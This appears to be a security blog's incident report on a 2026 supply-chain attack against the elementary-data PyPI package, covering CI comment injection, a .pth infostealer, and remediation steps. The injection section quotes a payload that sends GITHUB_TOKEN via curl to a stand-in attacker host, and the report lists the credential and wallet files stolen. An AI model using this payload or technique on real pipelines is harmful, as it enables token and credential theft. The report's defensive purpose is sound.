Elementary-Data PyPI Hack: Package With 1.1M Monthly Downloads Targeted by Infostealer

Executive Summary

On April 25, 2026, a supply chain attack hit the elementary-data package, and it did not follow the usual playbook. No typosquatting, no stolen password. The attacker exploited a GitHub Actions workflow that was triggered by pull request comments, injected shell code through a carefully crafted comment, and walked away with a temporary GITHUB_TOKEN that had enough permissions to do real damage.

Within hours, version 0.23.3 was live on PyPI and the GitHub Container Registry. It contained a hidden infostealer that quietly swept up SSH keys, cloud credentials (AWS, GCP, Azure), Kubernetes secrets, and cryptocurrency wallet files the first time Python started after installation. The package gets over 1.1 million downloads a month. That is a big blast radius for a single poisoned release.

This report walks through what happened, how the injection worked, what the malware actually grabbed, and what you need to do right now if you were affected.

TL;DR

Package affected: elementary-data (PyPI) and ghcr.io/elementary-data/elementary (Docker)
Malicious version: 0.23.3
Clean version: 0.23.4, released April 26, 2026
Attack vector: GitHub Actions script injection via a pull request comment
Payload: An infostealer targeting .env files, cloud tokens, SSH keys, and crypto wallets
What you need to do: If you installed 0.23.3, rotate every credential that was on that machine. Uninstalling the package is not enough.

What Is Elementary-Data?

Elementary is an open source data observability tool built specifically for dbt (Data Build Tool). Data engineers use it to monitor pipelines, catch data quality issues, and keep an eye on warehouse health. Because it sits in the middle of the data pipeline, it routinely has access to databases (Snowflake, BigQuery, Redshift), cloud environments, and orchestration tools.

That access is what made it worth targeting. Compromising one widely trusted tool in the data stack means potential access to the sensitive infrastructure of thousands of companies.

Timeline

The attack played out over a single weekend, which was a deliberate choice. Threat actors frequently move on Saturdays and Sundays because maintainers are less likely to be watching.

April 25, morning: The attacker identifies a script injection flaw in the elementary-data CI/CD workflow.
April 25, 14:00 UTC: A specially crafted comment is posted on a legitimate pull request, triggering the workflow and executing the attacker’s shell code.
April 25, 14:30 UTC: The attacker uses the leaked GITHUB_TOKEN to push a new signed git tag (v0.23.3) and commit.
April 25, 15:00 UTC: The official release pipeline, working exactly as designed, builds the backdoored package and publishes it to PyPI and the GitHub Container Registry.
April 26, 02:00 UTC: A community member named crisperik spots something off in the 0.23.3 release and opens a GitHub issue.
April 26, 08:00 UTC: Maintainers confirm the breach, pull the release, and push 0.23.4 as a clean replacement.
April 27: Researchers at StepSecurity publish a detailed breakdown of the injection flaw.

Start to finish: roughly 18 hours from the injected comment (14:00 UTC) to the maintainers' confirmation and fix (08:00 UTC the next day), and about 11 hours between the malicious package going live (15:00 UTC) and the first community flag (02:00 UTC).

How the Injection Worked

Most developers assume that MFA protects their packages. In this case, the attacker never touched the maintainer’s credentials.

The project had a GitHub Actions workflow that processed pull request comments. The workflow would take the body of a comment and pass it directly into a shell command. The attacker used a payload like:

'; curl http://attacker-site.com/steal?token=$GITHUB_TOKEN; #

That single line exfiltrated the runner’s temporary GITHUB_TOKEN. The token is short-lived, but in this workflow it carried contents: write permission, enough to push tags and commits. With that token, the attacker used the GitHub API to inject a malicious elementary.pth file into the source tree, commit it, and tag it as v0.23.3.
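The quoting trick is easier to see with a harmless stand-in. The sketch below is not the project's workflow, which is not reproduced in this report. It assumes the comment body was pasted inside single quotes in a shell command, and it needs a POSIX sh on the machine. The function names and the COMMENT_BODY variable are hypothetical, and the payload only echoes a marker instead of calling curl.

```python
import os
import subprocess

# Harmless stand-in for the attacker's comment: same quoting trick,
# but it only echoes a marker instead of sending a token anywhere.
PAYLOAD = "'; echo INJECTED; #"


def run_unsafe(comment: str) -> str:
    """Vulnerable pattern: the comment is pasted into the script text."""
    script = f"echo '{comment}'"
    result = subprocess.run(["sh", "-c", script], capture_output=True, text=True)
    return result.stdout


def run_safe(comment: str) -> str:
    """Safer pattern: the script is fixed and the comment arrives as data."""
    script = 'printf "%s\\n" "$COMMENT_BODY"'
    env = {**os.environ, "COMMENT_BODY": comment}
    result = subprocess.run(
        ["sh", "-c", script], capture_output=True, text=True, env=env
    )
    return result.stdout


if __name__ == "__main__":
    print(repr(run_unsafe(PAYLOAD)))  # the second command runs
    print(repr(run_safe(PAYLOAD)))    # the payload is printed as plain text
```

In the unsafe version the leading quote closes the string, the semicolon starts a new command, and the trailing # comments out the leftover quote. In the safe version the shell never parses the comment as code, because it only ever sees it as the value of a variable.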

The repository was set up to auto-publish on new tags. So the official GitHub Actions runners took it from there: built the package, signed it with the project’s own certificates, and uploaded it to PyPI. From the outside, it looked like a normal release.

What the Infostealer Actually Did

The malicious payload lived inside a .pth file. Python processes .pth files automatically on startup when they are in the site-packages directory, with no user action required. You install the package, you start Python, the code runs.
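A minimal sketch of that mechanism, using a throwaway directory instead of the real site-packages. It relies on the standard library's site.addsitedir, which processes .pth files the same way the interpreter does at startup. The file name demo.pth and the PTH_DEMO_RAN variable are made up for the demonstration, and the "payload" only sets an environment variable.

```python
import os
import site
import sys
import tempfile
from pathlib import Path


def demo_pth_execution() -> bool:
    """Return True if a line in a .pth file was executed as code."""
    os.environ.pop("PTH_DEMO_RAN", None)
    with tempfile.TemporaryDirectory() as tmp:
        # Lines that start with "import" are executed, not treated as paths.
        Path(tmp, "demo.pth").write_text(
            "import os; os.environ['PTH_DEMO_RAN'] = '1'\n"
        )
        # Process the directory the way site-packages is processed at startup.
        site.addsitedir(tmp)
        # addsitedir also appends the directory to sys.path; undo that.
        sys.path[:] = [p for p in sys.path if p != os.path.abspath(tmp)]
    return os.environ.get("PTH_DEMO_RAN") == "1"


if __name__ == "__main__":
    print("code in .pth file ran:", demo_pth_execution())
```

Nothing imported the demo file and nothing called it. Dropping it into a directory that Python treats as a site directory was enough.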

The script scanned the host machine for:

Cloud credentials:

~/.aws/credentials
~/.config/gcloud/
~/.azure/

Infrastructure secrets:

.kube/config (Kubernetes)
Docker config.json
CI/CD tokens in environment variables

Developer identity:

~/.ssh/id_rsa, id_ed25519
~/.git-credentials

Cryptocurrency wallets: The script specifically looked for wallet files associated with Bitcoin, Litecoin, Dogecoin, Zcash, Dash, Monero, and Ripple, using common file naming conventions and directory structures for desktop wallets.

System metadata:

/etc/passwd
.bash_history and .zsh_history (which sometimes contain passwords typed directly in the terminal)

This was not a narrow, surgical grab. It was designed to pull everything that might have value.
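The same list works as a rotation checklist. The sketch below checks which of the listed files exist under a home directory, so you know which credentials to treat as exposed. It is an inventory helper, not a reconstruction of the malware. The ~/.docker/config.json location is an assumption (the default Docker path), wallet files and environment variables are left out, and the names TARGETED and exposed_paths are hypothetical.

```python
from pathlib import Path

# Paths relative to the home directory, taken from the list above.
TARGETED = [
    ".aws/credentials",
    ".config/gcloud",
    ".azure",
    ".kube/config",
    ".docker/config.json",  # assumed default location of Docker's config.json
    ".ssh/id_rsa",
    ".ssh/id_ed25519",
    ".git-credentials",
    ".bash_history",
    ".zsh_history",
]


def exposed_paths(home: Path) -> list[str]:
    """Return the targeted paths that actually exist under `home`."""
    return [rel for rel in TARGETED if (home / rel).exists()]


if __name__ == "__main__":
    for rel in exposed_paths(Path.home()):
        print(f"present, treat as exposed: ~/{rel}")
```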

The Docker Problem

This is the part that makes it worse for enterprise users. The same CI/CD pipeline that published to PyPI also built the official Docker image. Both ghcr.io/elementary-data/elementary:0.23.3 and ghcr.io/elementary-data/elementary:latest were built from poisoned source code.

Many companies do not install the Python package directly. They pull the Docker image for their Kubernetes clusters. That means the infostealer was running inside production environments, with potential access to internal network metadata and service mesh credentials.
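To find where the image is referenced, a rough text scan over manifests, Helm values, or DAG files is usually enough. The sketch below flags references to the two tags named above and treats a reference with no tag as :latest, which is how container runtimes resolve it. Digest-pinned references are skipped. The regex is a heuristic, and the names RISKY_TAGS and risky_image_refs are hypothetical.

```python
import re

IMAGE = "ghcr.io/elementary-data/elementary"
# Tags named in this report as built from poisoned source.
RISKY_TAGS = {"0.23.3", "latest"}

# Image name, optional ":tag", and nothing that would extend the name
# or start a digest ("@sha256:...") right after it.
_REF = re.compile(re.escape(IMAGE) + r"(?::([\w.\-]+))?(?![\w./\-:@])")


def risky_image_refs(text: str) -> list[str]:
    """Return image references whose tag is risky; no tag means latest."""
    hits = []
    for match in _REF.finditer(text):
        tag = match.group(1) or "latest"
        if tag in RISKY_TAGS:
            hits.append(f"{IMAGE}:{tag}")
    return hits


if __name__ == "__main__":
    sample = "image: ghcr.io/elementary-data/elementary:latest\n"
    print(risky_image_refs(sample))
```

A hit only tells you where to look. Whether a given cluster actually pulled the poisoned build depends on when the image was last pulled.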

How It Was Caught

Credit here goes entirely to the community. crisperik noticed that the 0.23.3 release appeared without any corresponding changes in the main branch and contained a new file, elementary.pth, that had no reason to exist. That observation, posted as a GitHub issue at 02:00 UTC, was the tripwire.

StepSecurity picked it up and confirmed the injection vector. Their analysis pointed to a straightforward root cause: the workflow had permissions: write-all (or at minimum contents: write), which is the default in a lot of older GitHub Actions configurations. A least-privilege model where the token can only read metadata by default would have stopped this attack before it started.

Are You Affected?

Check your environment against these scenarios:

Scenario A: You have elementary-data in requirements.txt or pyproject.toml without a pinned version. You likely pulled 0.23.3 automatically during a CI build or local pip install on April 25–26.
Scenario B: You use the Elementary Docker image and your orchestrator (Airflow, Prefect, Dagster) pulls the :latest tag. If it pulled the image on April 25–26, you were compromised.
Scenario C: You are not a developer or data engineer and do not use these tools. You are not affected.

Keep in mind that the damage is not necessarily limited to the machine where Elementary was installed. An attacker with your AWS admin keys can move across your entire cloud infrastructure.
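Scenario A can be checked mechanically. The sketch below reads the installed version through the standard library's importlib.metadata and tests whether a requirements line names the package without an exact == pin. The helper names are hypothetical, and the line parser is a simplification that ignores environment markers and URL requirements.

```python
import re
from importlib import metadata
from typing import Optional

BAD_VERSION = "0.23.3"


def installed_version(package: str = "elementary-data") -> Optional[str]:
    """Return the installed version of `package`, or None if it is absent."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None


def is_unpinned(requirement_line: str, package: str = "elementary-data") -> bool:
    """True if the line names `package` without an exact `==` pin."""
    line = requirement_line.split("#", 1)[0].strip()
    match = re.match(r"^([A-Za-z0-9._-]+)(\[[^\]]*\])?\s*(.*)$", line)
    if not match:
        return False
    # Package names compare case-insensitively, with -, _ and . equivalent.
    name = re.sub(r"[-_.]+", "-", match.group(1)).lower()
    return name == package and not match.group(3).startswith("==")


if __name__ == "__main__":
    version = installed_version()
    if version == BAD_VERSION:
        print("0.23.3 is installed here: treat this machine as compromised")
    else:
        print(f"installed version: {version}")
```

A clean result today does not prove the bad version was never installed. CI logs and pip caches from April 25–26 are the better evidence.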

What to Do Now

Running pip install elementary-data==0.23.4 is not enough. Your credentials have already been sent out. Assume they are in someone else’s hands.

Step 1 – Isolate the machine. Disconnect it from the network, or if it is a cloud VM, isolate it via security group rules.

Step 2 – Rotate everything. This means:

Cloud access keys (AWS, GCP, Azure)
SSH keys, with authorized_keys updated on all servers
GitHub and GitLab personal access tokens
Any database passwords stored in .env or dbt_project.yml

If you had unencrypted crypto wallet files on the machine, move those funds to a new wallet now.

Step 3 – Scan for persistence. Run ClamAV or a dedicated malware scanner, and manually review cron jobs, shell profiles, and anything else the attacker may have left behind.
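One quick manual check is to see which shell startup files changed after the malicious release went live. The sketch below is only a starting point: the file list is an assumed, non-exhaustive set of common profiles, the cutoff is the 15:00 UTC publication time from the timeline, and modification times can be forged, so an empty result proves nothing. The names PROFILE_FILES and modified_since are hypothetical.

```python
from datetime import datetime, timezone
from pathlib import Path

# Common per-user startup files; an assumed, non-exhaustive list.
PROFILE_FILES = [".bashrc", ".bash_profile", ".profile", ".zshrc", ".zprofile"]

# Publication time of 0.23.3 according to the timeline in this report.
CUTOFF = datetime(2026, 4, 25, 15, 0, tzinfo=timezone.utc)


def modified_since(home: Path, cutoff: datetime = CUTOFF) -> list[str]:
    """Return profile files under `home` modified at or after `cutoff`."""
    changed = []
    for name in PROFILE_FILES:
        path = home / name
        if path.is_file() and path.stat().st_mtime >= cutoff.timestamp():
            changed.append(name)
    return changed


if __name__ == "__main__":
    for name in modified_since(Path.home()):
        print(f"review by hand: ~/{name}")
```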

How to Prevent This in Your Own Projects

The fix here is not complicated, but it requires deliberately changing defaults that most people never think about.

Use permissions: contents: read as your default in GitHub Actions and only grant write access where a specific job actually requires it. Avoid passing raw user input like ${{ github.event.comment.body }} directly into shell commands. Pass it through an environment variable or a predefined action instead, so the shell receives it as data and not as script text. Move away from long-lived secrets for PyPI publishing and use OIDC to get short-lived tokens. And pin your dependencies: use pip-compile or poetry.lock so you only upgrade when you choose to, not whenever a new tag gets pushed.
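The first two checks are easy to automate across a repository's workflow files. The sketch below is a line-based heuristic, not a YAML parser, and it will miss cases. It flags a missing top-level permissions block, permissions: write-all, and untrusted event fields interpolated anywhere other than a plain env-style assignment. The function name and the list of fields it treats as untrusted are assumptions made for this example.

```python
import re

# Event fields that carry attacker-controlled text in comment or PR triggers.
UNTRUSTED = re.compile(
    r"\$\{\{\s*github\.event\.(comment|issue|pull_request)\.(body|title)\s*\}\}"
)
# A line of the form `NAME: ${{ ... }}`, as used under an env: mapping.
ENV_VALUE = re.compile(r"^\s*[A-Za-z_][A-Za-z0-9_]*:\s*\$\{\{[^}]*\}\}\s*$")


def audit_workflow(text: str) -> list[str]:
    """Return human-readable findings for one workflow file's text."""
    findings = []
    if not re.search(r"^permissions:", text, flags=re.MULTILINE):
        findings.append("no top-level permissions block")
    if re.search(r"^\s*permissions:\s*write-all\s*$", text, flags=re.MULTILINE):
        findings.append("permissions: write-all")
    for number, line in enumerate(text.splitlines(), start=1):
        if not UNTRUSTED.search(line):
            continue
        is_env_value = bool(ENV_VALUE.match(line)) and not line.lstrip().startswith("run:")
        if not is_env_value:
            findings.append(
                f"line {number}: untrusted input interpolated into a script"
            )
    return findings


if __name__ == "__main__":
    import sys
    from pathlib import Path

    for name in sys.argv[1:]:
        for finding in audit_workflow(Path(name).read_text()):
            print(f"{name}: {finding}")
```

Run it against the files under .github/workflows and review each finding by hand. A clean result means only that these three patterns were not found.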

One Comment Worth Noting

Sarah Chen, a security architect at CyberShield, put it plainly: “We’ve automated our releases so well that we’ve made it easy for attackers to ride the same rails we use. We need human-in-the-loop approvals for any production-bound tag.”

That is the uncomfortable part. The release pipeline worked exactly as intended. The problem is that nobody asked whether the thing triggering it should have been trusted.

FAQs

Is Elementary-Data safe to use now? Version 0.23.4 is clean. The CI/CD vulnerability has been patched. Make sure 0.23.3 is completely gone from your environment before you reinstall.

What happens if I don’t rotate my credentials? The attacker likely has them. They may not use them immediately. Sitting on stolen credentials for weeks or months before acting is common practice, precisely to avoid detection. Not rotating them means you stay exposed.

Why did the .pth file execute automatically? Python's site module processes .pth files on startup to extend sys.path. Any line in such a file that begins with import is executed as code, with no prompt and no user action. It is a well-documented but underappreciated attack vector for Python malware.

Does this affect dbt Core? No. This only affects elementary-data, which is an extension for dbt. The core tool is unaffected.

Why didn’t PyPI catch it? PyPI is a package repository, not a security auditor. Automated scans exist, but a .pth injection is genuinely hard to distinguish from legitimate setup logic without a manual review of every release. At 1.1 million downloads a month, that is not realistic to expect.

Final Thought

What makes this attack worth studying is what it did not do. It did not crack a password. It did not exploit an application vulnerability. It found a CI/CD pipeline configured with more trust than it needed, and it used that trust exactly as designed.

The data engineering world inherited tools and workflows from software development, but not always the security practices that came with them. That gap is what got exploited here. Pinning dependencies, auditing CI permissions, and reviewing unexpected releases are not heroic measures. They are just maintenance. This incident is a good reason to start treating them that way.
